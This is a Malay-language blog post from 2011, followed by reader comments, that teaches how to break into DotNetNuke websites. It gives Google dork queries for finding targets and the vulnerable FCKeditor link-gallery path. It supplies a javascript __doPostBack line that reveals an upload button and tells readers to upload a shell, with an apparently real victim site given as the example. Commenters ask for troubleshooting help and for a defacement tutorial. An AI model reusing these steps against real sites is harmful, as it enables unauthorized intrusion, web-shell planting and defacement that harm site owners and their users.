DRAGONFOCRE FM

Friday 27 May 2011

DNN hacks (DotNetNuke)

Hari ini saya akan ajar, bagai mana hendak hack website dengan cara DNN.
Sila ikut step by step :

1) Open google dan cari :
  • inurl:”/portals/0″
  • inurl:tabid/176/Default.aspx
  • :inurl:/tabid/36/language/en-US/Default.aspx
  • inurl:'/portal/0/?site:.com
p/s: pilih antara satu.

2) Dah dapat target? Ok, sekarang tambahkan code di bawah ini di belakang link target.
  • /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
3) Bila page keluar seperti ini, sila click pada "File(A File On Your Site)"

6) Langkah seterusnya, copy code dibawah dan paste pada address bar.
  • javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
7) Tekan "Enter"

8) Butang "Upload" akan muncul seperti gambar dibawah.

9) Langkah seterusnya adalah, Upload shell yang anda telah sediakan atau yang anda download.
p/s : File bentuk .txt / .swf / .jpg / .gif / .pdf / .png sahaja boleh diupload.

10) Setelah siap Upload. Anda boleh temui file anda itu tadi di dalam website si mangsa.
tambahkan "/Portal/0/file anda.extension file" Contoh : http://www.pumpsandpressure.net/Portals/0/C4.PNG


11) Siap! ^__^
Good Luck!!! Related Posts Plugin for WordPress, Blogger...

10 comments:

  1. ada masalah kt step 2)...server not found

    ReplyDelete
  2. masalah step ke dua..?
    contoh :

    www.target.com

    so jadikan dia :

    www.target.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

    ReplyDelete
  3. ok ok step pertama tuh inurl:'/portal/0/?site:.com

    macam mana mahu cari ? kt google banyak

    ReplyDelete
  4. memang banyak.. pilih antara 1 je..
    dan x semua dapat buat..

    ReplyDelete
  5. bro, boleh buat tutorial deface?

    ReplyDelete
  6. devilc0de??? oppss...!
    saya tak pandai..
    sory kalau saya buat silap.

    ReplyDelete
  7. lepas paste nie (/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx) dye x kuar cam kt ats tue pon..

    ink Gallery
    URL:
    Use selected link
    x same cm kt ats

    ReplyDelete
  8. camne nk masukkan javascript nye ;link xphm ar ==? apa bentuk link tuh lepas taruk java script tuh..

    ReplyDelete